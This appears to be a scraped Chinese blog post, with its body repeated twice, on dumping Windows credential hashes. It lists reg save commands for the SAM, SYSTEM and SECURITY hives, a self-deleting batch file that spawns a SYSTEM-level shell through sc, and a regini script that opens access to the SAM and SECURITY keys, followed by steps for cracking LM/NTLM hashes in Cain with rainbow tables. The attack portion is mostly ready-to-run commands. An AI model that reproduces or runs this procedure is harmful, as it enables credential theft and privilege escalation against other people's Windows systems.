匯出系統登錄檔抓Hash的思路整理
首先使用 administrator許可權登入,然後使用 reg來儲存登錄檔中 HKLM下的 SECURITY,SAM,SYSTEM,注意這裡必須使用 reg的 save選項,export選項是不行的,
reg save hklm\sam sam.hive
reg save hklm\system ystem.hive
reg save hklm\security security.hive
然後把 sam.hive,system.hive,security.hive下載回本地,開啟 CAIN,在"Decoders"標籤下,點"LSA Secrets", 點"+"來匯入 system.hive和 security.hive.
==============================
要破解 LM/NTLM hash,首先點"cracker"標籤下的"LM&NTLM hashes",然後點"+",匯入 sam.hive,注意由於現在的 win2000以後都預設使用了 syskey,所以還要匯入 system.hive中的 syskey的值,然後就可以彩虹表破解了。
==============================
1、以下是TheLostMind的思路
對使用者許可權要求,預設XP SP3是匯出不了的,我本地測試了,但是system許可權是可以的,那麼我們可以建立一個system許可權執行的CMD,然後再匯出就OK了。
其他系統上面沒測試過,大家自己整吧。
首先建立一個系統許可權執行的CMD:
======================StartSystemCmd.bat=========
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0
=======================END=========================
然後匯出檔案。
==================SaveReg.bat=======================
@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
=====================END============================
然後倒入到CAIN裡面破吧。
2、我的思路
有時我們不方便再跳出一個CMD,這時可以利用命令regini.exe修改登錄檔的訪問許可權。
首先新建一個文字檔案pri.ini,內容如下:
===========pri.ini===================
HKEY_LOCAL_MACHINE\SECURITY [1 17]
HKEY_LOCAL_MACHINE\SAM [1 17]
===================================
然後執行 regini.exe pri.ini
寫成批處理的內容如下:
================================
echo HKEY_LOCAL_MACHINE\SECURITY [1 17]>pri.ini
echo HKEY_LOCAL_MACHINE\SAM [1 17]>>pri.ini
regini.exe pri.ini
del pri.ini
================================
注:以上操作是將hklm\security與hklm\sam賦予Administrators和System完全訪問的許可權。hklm\system一般對管理員是放開訪問的,可視情況修改。以上兩個表項對系統登陸至關重要,請謹慎修改。
最後就可以直接利用reg匯出登錄檔內容。
reg save hklm\sam sam.hive
reg save hklm\system ystem.hive
reg save hklm\security security.hive
然後把 sam.hive,system.hive,security.hive下載回本地,開啟 CAIN,在"Decoders"標籤下,點"LSA Secrets", 點"+"來匯入 system.hive和 security.hive.
==============================
要破解 LM/NTLM hash,首先點"cracker"標籤下的"LM&NTLM hashes",然後點"+",匯入 sam.hive,注意由於現在的 win2000以後都預設使用了 syskey,所以還要匯入 system.hive中的 syskey的值,然後就可以彩虹表破解了。
==============================
1、以下是TheLostMind的思路
對使用者許可權要求,預設XP SP3是匯出不了的,我本地測試了,但是system許可權是可以的,那麼我們可以建立一個system許可權執行的CMD,然後再匯出就OK了。
其他系統上面沒測試過,大家自己整吧。
首先建立一個系統許可權執行的CMD:
======================StartSystemCmd.bat=========
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0
=======================END=========================
然後匯出檔案。
==================SaveReg.bat=======================
@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
=====================END============================
然後倒入到CAIN裡面破吧。
2、我的思路
有時我們不方便再跳出一個CMD,這時可以利用命令regini.exe修改登錄檔的訪問許可權。
首先新建一個文字檔案pri.ini,內容如下:
===========pri.ini===================
HKEY_LOCAL_MACHINE\SECURITY [1 17]
HKEY_LOCAL_MACHINE\SAM [1 17]
===================================
然後執行 regini.exe pri.ini
寫成批處理的內容如下:
================================
echo HKEY_LOCAL_MACHINE\SECURITY [1 17]>pri.ini
echo HKEY_LOCAL_MACHINE\SAM [1 17]>>pri.ini
regini.exe pri.ini
del pri.ini
================================
注:以上操作是將hklm\security與hklm\sam賦予Administrators和System完全訪問的許可權。hklm\system一般對管理員是放開訪問的,可視情況修改。以上兩個表項對系統登陸至關重要,請謹慎修改。
最後就可以直接利用reg匯出登錄檔內容。
相關文章
- 登錄檔碎片整理是一種最佳化作業系統登錄檔的方法,旨在減少登錄檔檔案的碎片化,從而提高系統效能和響應速度。它透過重新整理和最佳化登錄檔檔案的儲存結構,以及壓縮空閒空間等方式,來改善系統的整體表現。作業系統
- 使用Java操作Windows系統登錄檔JavaWindows
- VB中使用系統登錄檔 (轉)
- win10系統中登錄檔如何開啟 win10系統開啟登錄檔的步驟Win10
- Windows XP系統登錄檔的恢復(轉)Windows
- M$的系統啟動在登錄檔的位置
- win10系統修改登錄檔後儲存不了提示寫入登錄檔時出錯如何解決Win10
- 匯出當前域內所有使用者hash的技術整理
- Windows10系統登錄檔出現問題怎麼修復Windows
- 駭客經常更改的系統配置檔案及登錄檔(轉)
- 一個通用的匯入匯出excel的思路Excel
- win10系統怎麼修復登錄檔_win10登錄檔怎麼修復Win10
- win10系統登錄檔怎麼修復 win10一鍵修復登錄檔Win10
- win10系統提示無法匯入登錄檔xxx未將所有資料都成功寫入到登錄檔中如何解決Win10
- Win10系統清理登錄檔垃圾的方法【圖文】Win10
- Win10系統利用登錄檔隱藏onedrive的方法Win10
- win10怎麼刪除系統無用的登錄檔 win10如何清理無效登錄檔Win10
- win10系統登錄檔資訊怎麼刪除,win10電腦清除登錄檔資訊的方法Win10
- 小米手機怎麼匯出錄音檔案?小米手機錄音匯出方法
- Windows10系統恢復及備份登錄檔的方法Windows
- Win10系統怎麼修改登錄檔ProfileName值Win10
- Win10系統如何清理登錄檔垃圾【圖文】Win10
- Win10系統開啟登錄檔提示“登錄檔編輯器已停止工作”怎麼辦Win10
- 在VC++中訪問和修改系統登錄檔 (轉)
- ORACLE在UNIX、LINUX系統中匯出、匯入時最好保持匯出、匯入系統的字符集一致OracleLinux
- 記錄:匯出檔案為十六進位制
- win10系統利用登錄檔修改資料夾命名方式的方法Win10
- Windows10系統通過登錄檔修改版本號的技巧Windows
- Windows10系統透過登錄檔修改版本號的技巧Windows
- win10系統如何通過登錄檔關閉135埠_win10利用登錄檔關閉135埠的方法Win10
- win10系統如何透過登錄檔關閉135埠_win10利用登錄檔關閉135埠的方法Win10
- win10修改登錄檔沒有許可權怎麼辦 win10系統下修改登錄檔許可權的方法Win10
- MySQL匯入匯出檔案檔案MySql
- 聊聊 SAP ABAP 系統裡除了 TADIR 之外的其他登錄檔試讀版
- Windows10系統下開啟登錄檔編輯器的2種方法Windows
- 記錄一次sqlplus匯出檔案SQL
- JQuery登錄檔單jQuery
- VC操作登錄檔